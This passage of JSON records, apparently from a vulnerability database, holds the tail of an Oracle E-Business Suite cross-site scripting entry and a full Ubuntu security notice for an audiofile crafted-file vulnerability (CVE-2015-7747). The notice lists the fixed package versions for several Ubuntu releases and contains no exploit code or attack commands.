"edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32658", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32658", "title": "[ERPSCAN-15-027] Oracle E-Business Suite - Cross Site Scripting Vulnerability", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-7747"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2787-1\r\nOctober 28, 2015\r\n\r\naudiofile vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\naudiofile could be made to crash or run programs as your login if it\r\nopened a specially crafted file.\r\n\r\nSoftware Description:\r\n- audiofile: Open-source version of the SGI audiofile library\r\n\r\nDetails:\r\n\r\nFabrizio Gennari discovered that audiofile incorrectly handled changing\r\nboth the sample format and the number of channels. If a user or automated\r\nsystem were tricked into processing a specially crafted file, audiofile\r\ncould be made to crash, leading to a denial of service, or possibly execute\r\narbitrary code.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libaudiofile1 0.3.6-2ubuntu0.15.10.1\r\n\r\nUbuntu 15.04:\r\n libaudiofile1 0.3.6-2ubuntu0.15.04.1\r\n\r\nUbuntu 14.04 LTS:\r\n libaudiofile1 0.3.6-2ubuntu0.14.04.1\r\n\r\nUbuntu 12.04 LTS:\r\n libaudiofile1 0.3.3-2ubuntu0.1\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2787-1\r\n CVE-2015-7747\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.15.10.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.15.04.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.14.04.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.3-2ubuntu0.1\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32652", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32652", "title": "[USN-2787-1] audiofile vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}
